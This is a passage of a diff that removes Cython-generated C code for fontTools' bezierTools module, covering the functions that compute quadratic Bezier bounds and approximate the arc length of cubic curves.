__pyx_7genexpr__pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Multiply(__pyx_v_bx, __pyx_7genexpr__pyx_v_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_8 = PyNumber_Add(__pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Add(__pyx_t_8, __pyx_v_cx); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = PyNumber_Multiply(__pyx_v_ay, __pyx_7genexpr__pyx_v_t); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_8, __pyx_7genexpr__pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 325, __pyx_L15_error) - 
__Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = PyNumber_Multiply(__pyx_v_by, __pyx_7genexpr__pyx_v_t); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_6 = PyNumber_Add(__pyx_t_2, __pyx_t_8); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = PyNumber_Add(__pyx_t_6, __pyx_v_cy); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = PyTuple_New(2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 325, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_t_3)) __PYX_ERR(0, 325, __pyx_L15_error); - __Pyx_GIVEREF(__pyx_t_8); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_t_8)) __PYX_ERR(0, 325, __pyx_L15_error); - __pyx_t_3 = 0; - __pyx_t_8 = 0; - if (unlikely(__Pyx_ListComp_Append(__pyx_t_1, (PyObject*)__pyx_t_6))) __PYX_ERR(0, 324, __pyx_L15_error) - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":327 - * (ax * t * t + bx * t + cx, ay * t * t + by * t + cy) - * for t in roots - * if 0 <= t < 1 # <<<<<<<<<<<<<< - * ] + [pt1, pt3] - * return calcBounds(points) - */ - } - - /* "fontTools/misc/bezierTools.py":326 - * points = [ - * (ax * t * t + bx * t + cx, ay * t * t + by * t + cy) - * for t in roots # <<<<<<<<<<<<<< - * if 0 <= t < 1 - * ] + [pt1, pt3] - */ - } - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_XDECREF(__pyx_7genexpr__pyx_v_t); __pyx_7genexpr__pyx_v_t = 0; - goto __pyx_L20_exit_scope; - __pyx_L15_error:; - __Pyx_XDECREF(__pyx_7genexpr__pyx_v_t); __pyx_7genexpr__pyx_v_t = 0; - goto __pyx_L1_error; - __pyx_L20_exit_scope:; - } /* exit inner scope */ - - /* "fontTools/misc/bezierTools.py":328 - * for t in roots - * if 0 <= t < 1 - * ] + [pt1, pt3] # <<<<<<<<<<<<<< 
- * return calcBounds(points) - * - */ - __pyx_t_5 = PyList_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 328, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_5, 0, __pyx_v_pt1)) __PYX_ERR(0, 328, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt3); - __Pyx_GIVEREF(__pyx_v_pt3); - if (__Pyx_PyList_SET_ITEM(__pyx_t_5, 1, __pyx_v_pt3)) __PYX_ERR(0, 328, __pyx_L1_error); - __pyx_t_6 = PyNumber_Add(__pyx_t_1, __pyx_t_5); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 328, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_v_points = ((PyObject*)__pyx_t_6); - __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":329 - * if 0 <= t < 1 - * ] + [pt1, pt3] - * return calcBounds(points) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_calcBounds); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 329, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_1 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_5))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_5); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_5, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_v_points}; - __pyx_t_6 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 329, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } - __pyx_r = __pyx_t_6; - __pyx_t_6 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":298 - * - * - * def calcQuadraticBounds(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the bounding rectangle for a quadratic Bezier segment. 
- * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticBounds", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_cx); - __Pyx_XDECREF(__pyx_v_cy); - __Pyx_XDECREF(__pyx_v_ax2); - __Pyx_XDECREF(__pyx_v_ay2); - __Pyx_XDECREF(__pyx_v_roots); - __Pyx_XDECREF(__pyx_v_points); - __Pyx_XDECREF(__pyx_7genexpr__pyx_v_t); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":332 - * - * - * def approximateCubicArcLength(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * """Approximates the arc length for a cubic Bezier segment. 
- * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_19approximateCubicArcLength(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_18approximateCubicArcLength, "approximateCubicArcLength(pt1, pt2, pt3, pt4)\nApproximates the arc length for a cubic Bezier segment.\n\n Uses Gauss-Lobatto quadrature with n=5 points to approximate arc length.\n See :func:`calcCubicArcLength` for a slower but more accurate result.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n\n Returns:\n Arc length value.\n\n Example::\n\n >>> approximateCubicArcLength((0, 0), (25, 100), (75, 100), (100, 0))\n 190.04332968932817\n >>> approximateCubicArcLength((0, 0), (50, 0), (100, 50), (100, 100))\n 154.8852074945903\n >>> approximateCubicArcLength((0, 0), (50, 0), (100, 0), (150, 0)) # line; exact result should be 150.\n 149.99999999999991\n >>> approximateCubicArcLength((0, 0), (50, 0), (100, 0), (-50, 0)) # cusp; exact result should be 150.\n 136.9267662156362\n >>> approximateCubicArcLength((0, 0), (50, 0), (100, -50), (-50, 0)) # cusp\n 154.80848416537057\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_19approximateCubicArcLength = {"approximateCubicArcLength", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_19approximateCubicArcLength, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_18approximateCubicArcLength}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_19approximateCubicArcLength(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 
0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_pt4 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("approximateCubicArcLength (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 332, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 332, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateCubicArcLength", 1, 4, 4, 1); __PYX_ERR(0, 
332, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 332, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateCubicArcLength", 1, 4, 4, 2); __PYX_ERR(0, 332, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 332, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateCubicArcLength", 1, 4, 4, 3); __PYX_ERR(0, 332, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "approximateCubicArcLength") < 0)) __PYX_ERR(0, 332, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_pt4 = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("approximateCubicArcLength", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 332, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.approximateCubicArcLength", __pyx_clineno, 
__pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_18approximateCubicArcLength(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_18approximateCubicArcLength(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *__pyx_t_7 = NULL; - int __pyx_t_8; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("approximateCubicArcLength", 1); - - /* "fontTools/misc/bezierTools.py":357 - * 154.80848416537057 - * """ - * return approximateCubicArcLengthC( # <<<<<<<<<<<<<< - * complex(*pt1), complex(*pt2), complex(*pt3), complex(*pt4) - * ) - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_approximateCubicArcLengthC); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 357, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - - /* "fontTools/misc/bezierTools.py":358 - * """ - * return approximateCubicArcLengthC( - * complex(*pt1), complex(*pt2), complex(*pt3), complex(*pt4) # <<<<<<<<<<<<<< - * ) - * - */ - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 358, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if 
(unlikely(!__pyx_t_4)) __PYX_ERR(0, 358, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 358, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 358, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 358, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 358, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 358, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 358, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_8 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_8 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[5] = {__pyx_t_3, __pyx_t_4, __pyx_t_5, __pyx_t_6, __pyx_t_7}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_8, 4+__pyx_t_8); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 357, 
__pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":332 - * - * - * def approximateCubicArcLength(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * """Approximates the arc length for a cubic Bezier segment. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_AddTraceback("fontTools.misc.bezierTools.approximateCubicArcLength", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":362 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_21approximateCubicArcLengthC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_20approximateCubicArcLengthC, "approximateCubicArcLengthC(double complex pt1, double complex pt2, double complex pt3, double complex pt4)\nApproximates the arc length for a cubic Bezier segment.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as complex numbers.\n\n Returns:\n Arc length value.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_21approximateCubicArcLengthC = {"approximateCubicArcLengthC", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_21approximateCubicArcLengthC, __Pyx_METH_FASTCALL|METH_KEYWORDS, 
__pyx_doc_9fontTools_4misc_11bezierTools_20approximateCubicArcLengthC}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_21approximateCubicArcLengthC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - __pyx_t_double_complex __pyx_v_pt1; - __pyx_t_double_complex __pyx_v_pt2; - __pyx_t_double_complex __pyx_v_pt3; - __pyx_t_double_complex __pyx_v_pt4; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("approximateCubicArcLengthC (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) 
__PYX_ERR(0, 362, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 362, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateCubicArcLengthC", 1, 4, 4, 1); __PYX_ERR(0, 362, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 362, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateCubicArcLengthC", 1, 4, 4, 2); __PYX_ERR(0, 362, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 362, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateCubicArcLengthC", 1, 4, 4, 3); __PYX_ERR(0, 362, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "approximateCubicArcLengthC") < 0)) __PYX_ERR(0, 362, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_pt1 = __Pyx_PyComplex_As___pyx_t_double_complex(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 376, __pyx_L3_error) - __pyx_v_pt2 = 
__Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 376, __pyx_L3_error) - __pyx_v_pt3 = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 376, __pyx_L3_error) - __pyx_v_pt4 = __Pyx_PyComplex_As___pyx_t_double_complex(values[3]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 376, __pyx_L3_error) - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("approximateCubicArcLengthC", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 362, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.approximateCubicArcLengthC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_20approximateCubicArcLengthC(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject 